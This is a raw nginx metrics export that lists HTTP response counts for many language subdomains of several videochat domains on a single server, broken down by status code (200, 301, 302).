nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ta.videochat.show"} 17876 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ta.videochat.tv.br"} 73926 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ta.videochat.world"} 53226 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="te.videochat.cafe"} 32444 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="te.videochat.date"} 25605 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="te.videochat.mx"} 16939 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="te.videochat.show"} 14338 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="te.videochat.tv.br"} 57651 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="te.videochat.world"} 65613 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="test.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tg.videochat.cafe"} 38183 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tg.videochat.date"} 29169 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tg.videochat.mx"} 14047 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tg.videochat.show"} 11506 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tg.videochat.tv.br"} 48850 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tg.videochat.world"} 65329 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="th.videochat.cafe"} 29017 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="th.videochat.date"} 19289 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="th.videochat.mx"} 13845 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="th.videochat.show"} 14274 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="th.videochat.tv.br"} 52751 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="th.videochat.world"} 61573 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tl.videochat.cafe"} 32755 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tl.videochat.date"} 32621 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tl.videochat.mx"} 32262 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tl.videochat.show"} 19809 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tl.videochat.tv.br"} 49802 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tl.videochat.world"} 55164 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tr.videochat.cafe"} 37934 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tr.videochat.date"} 27651 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tr.videochat.mx"} 23892 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tr.videochat.show"} 20715 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tr.videochat.tv.br"} 46609 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tr.videochat.world"} 62746 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tt.videochat.cafe"} 30761 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tt.videochat.date"} 19811 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tt.videochat.mx"} 26449 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tt.videochat.show"} 17259 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tt.videochat.tv.br"} 44289 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="tt.videochat.world"} 50908 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="udm.videochat.cafe"} 17587 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="udm.videochat.date"} 11162 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="udm.videochat.mx"} 19181 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="udm.videochat.show"} 14223 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="udm.videochat.tv.br"} 35491 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="udm.videochat.world"} 41468 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uk.videochat.cafe"} 32001 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uk.videochat.date"} 18105 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uk.videochat.mx"} 14320 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uk.videochat.show"} 19928 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uk.videochat.tv.br"} 35724 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uk.videochat.world"} 40132 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ur.videochat.cafe"} 29068 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ur.videochat.date"} 24534 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ur.videochat.mx"} 25597 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ur.videochat.show"} 16095 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ur.videochat.tv.br"} 70212 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="ur.videochat.world"} 56428 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uz.videochat.cafe"} 19414 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uz.videochat.date"} 20074 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uz.videochat.mx"} 17716 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uz.videochat.show"} 10155 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uz.videochat.tv.br"} 34137 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uz.videochat.world"} 31583 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="uzjrval.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="vi.videochat.cafe"} 47087 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="vi.videochat.date"} 28939 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="vi.videochat.mx"} 21176 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="vi.videochat.show"} 29905 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="vi.videochat.tv.br"} 55771 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="vi.videochat.world"} 90917 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="videochat.cafe"} 196326 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="videochat.date"} 139605 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="videochat.mx"} 249184 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="videochat.show"} 139039 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="videochat.tv.br"} 301954 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="videochat.world"} 263621 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="wjftnkk.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="wmiqjupdanpt.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="www.videochat.cafe"} 9 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="www.videochat.date"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="www.videochat.mx"} 7 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="www.videochat.show"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="www.videochat.world"} 19 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="xh.videochat.cafe"} 15334 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="xh.videochat.date"} 20526 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="xh.videochat.mx"} 23748 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="xh.videochat.show"} 13002 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="xh.videochat.tv.br"} 34887 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="xh.videochat.world"} 39063 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="xicipcrvyobs.videochat.mx"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="yi.videochat.cafe"} 22893 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="yi.videochat.date"} 26507 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="yi.videochat.mx"} 19496 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="yi.videochat.show"} 13797 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="yi.videochat.tv.br"} 46865 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="yi.videochat.world"} 55864 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="zh.videochat.cafe"} 15205 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="zh.videochat.date"} 26994 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="zh.videochat.mx"} 16646 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="zh.videochat.show"} 15811 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="zh.videochat.tv.br"} 32920 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="200",vhost="zh.videochat.world"} 38184 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="301",vhost="hr.videochat.date"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="301",vhost="hr.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="301",vhost="it.videochat.date"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="301",vhost="it.videochat.world"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="301",vhost="pt.videochat.date"} 10 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="301",vhost="vi.videochat.world"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="301",vhost="videochat.cafe"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="301",vhost="videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="301",vhost="videochat.mx"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="301",vhost="videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="127.0.0.1"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="127.0.0.1:80"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="14fc525b-13a8-40c3-8f05-01cd06b04453.videochat.mx"} 319 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="161.97.120.25"} 9765 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="161.97.120.25:80"} 1693 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="43822297-98c3-4c96-b5b8-6a4c4675d440.videochat.mx"} 540 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="8115dadb-0b6b-4cca-ac37-a5cf02c05ca9.videochat.mx"} 279 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="84167165-jh888-17.tcr195p888.com"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="8f76d726-154f-4e15-83cf-3f4903a60b07.videochat.mx"} 371 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="admin.videochat.mx"} 22 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="af.videochat.cafe"} 738 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="af.videochat.date"} 245 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="af.videochat.mx"} 1096 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="af.videochat.show"} 236 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="af.videochat.tv.br"} 509 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="af.videochat.world"} 2310 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="agmeta.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="al.videochat.cafe"} 1215 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="al.videochat.date"} 348 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="al.videochat.mx"} 1132 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="al.videochat.show"} 336 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="al.videochat.tv.br"} 844 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="al.videochat.world"} 3098 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="am.videochat.cafe"} 805 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="am.videochat.date"} 435 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="am.videochat.mx"} 738 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="am.videochat.show"} 231 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="am.videochat.tv.br"} 761 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="am.videochat.world"} 2156 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="amadorseniorcenter-oit.videochat.mx"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="aotconsultinghoro.videochat.mx"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="api.cliproxy.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="api.ip.pn"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="api.videochat.mx"} 24 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="app.videochat.mx"} 27 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ar.videochat.cafe"} 3238 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ar.videochat.date"} 292 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ar.videochat.mx"} 2164 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ar.videochat.show"} 253 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ar.videochat.tv.br"} 1565 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ar.videochat.world"} 2960 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="az.videochat.cafe"} 932 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="az.videochat.date"} 132 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="az.videochat.mx"} 1198 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="az.videochat.show"} 369 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="az.videochat.tv.br"} 707 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="az.videochat.world"} 2565 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ba.videochat.cafe"} 1101 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ba.videochat.date"} 220 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ba.videochat.mx"} 1204 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ba.videochat.show"} 195 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ba.videochat.tv.br"} 1125 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ba.videochat.world"} 2986 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="backend.videochat.mx"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="be.videochat.cafe"} 1536 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="be.videochat.date"} 611 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="be.videochat.mx"} 993 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="be.videochat.show"} 192 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="be.videochat.tv.br"} 627 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="be.videochat.world"} 2201 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bestproxy.com"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bg.videochat.cafe"} 1040 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bg.videochat.date"} 2179 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bg.videochat.mx"} 1338 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bg.videochat.show"} 141 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bg.videochat.tv.br"} 758 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bg.videochat.world"} 2505 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bn.videochat.cafe"} 748 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bn.videochat.date"} 715 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bn.videochat.mx"} 982 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bn.videochat.show"} 249 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bn.videochat.tv.br"} 972 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bn.videochat.world"} 2799 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bs.videochat.cafe"} 961 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bs.videochat.date"} 242 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bs.videochat.mx"} 1362 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bs.videochat.show"} 328 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bs.videochat.tv.br"} 356 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bs.videochat.world"} 2074 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="bwfzopl.videochat.mx"} 315 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ca.videochat.cafe"} 699 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ca.videochat.date"} 204 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ca.videochat.mx"} 856 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ca.videochat.show"} 212 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ca.videochat.tv.br"} 644 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ca.videochat.world"} 2249 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ceb.videochat.cafe"} 672 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ceb.videochat.date"} 706 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ceb.videochat.mx"} 1213 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ceb.videochat.show"} 459 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ceb.videochat.tv.br"} 771 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ceb.videochat.world"} 2458 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="chitseyfamilydenhttjessicalovesdeno.videochat.mx"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="chm.videochat.cafe"} 1171 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="chm.videochat.date"} 397 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="chm.videochat.mx"} 929 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="chm.videochat.show"} 179 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="chm.videochat.tv.br"} 670 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="chm.videochat.world"} 2156 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ckdbbet.videochat.mx"} 250 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cs.videochat.cafe"} 869 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cs.videochat.date"} 2095 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cs.videochat.mx"} 844 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cs.videochat.show"} 231 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cs.videochat.tv.br"} 580 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cs.videochat.world"} 2281 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cy.videochat.cafe"} 880 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cy.videochat.date"} 532 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cy.videochat.mx"} 1108 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cy.videochat.show"} 213 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cy.videochat.tv.br"} 774 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cy.videochat.world"} 2973 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="cytjruk.videochat.mx"} 325 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="czhdzka.videochat.mx"} 391 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="da.videochat.cafe"} 943 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="da.videochat.date"} 2216 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="da.videochat.mx"} 863 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="da.videochat.show"} 134 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="da.videochat.tv.br"} 2109 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="da.videochat.world"} 2435 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ddb00497-7d32-400e-85c8-bc34712fde6d.videochat.mx"} 385 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="de.videochat.cafe"} 707 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="de.videochat.date"} 116 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="de.videochat.mx"} 1088 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="de.videochat.show"} 177 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="de.videochat.tv.br"} 554 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="de.videochat.world"} 2200 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="demo.videochat.mx"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="dev.videochat.mx"} 16 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="dwpqqsi.videochat.mx"} 204 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ee.videochat.cafe"} 1701 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ee.videochat.date"} 2106 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ee.videochat.mx"} 695 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ee.videochat.show"} 165 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ee.videochat.tv.br"} 1813 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="ee.videochat.world"} 823 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="el.videochat.cafe"} 721 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="el.videochat.date"} 224 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="el.videochat.mx"} 2883 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="el.videochat.show"} 113 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="el.videochat.tv.br"} 2126 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="el.videochat.world"} 2460 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="en.videochat.cafe"} 1010 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="en.videochat.date"} 20 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="en.videochat.mx"} 1440 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="en.videochat.show"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="en.videochat.tv.br"} 736 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="en.videochat.world"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eo.videochat.cafe"} 1487 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eo.videochat.date"} 241 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eo.videochat.mx"} 1443 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eo.videochat.show"} 198 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eo.videochat.tv.br"} 648 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="eo.videochat.world"} 2336 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="es.videochat.cafe"} 1040 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="es.videochat.date"} 2333 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="es.videochat.show"} 289 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="es.videochat.tv.br"} 1078 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="es.videochat.world"} 2387 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="et.videochat.cafe"} 1108 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="et.videochat.date"} 544 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="et.videochat.mx"} 1180 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="et.videochat.show"} 636 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="et.videochat.tv.br"} 956 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="302",vhost="et.videochat.world"} 1467 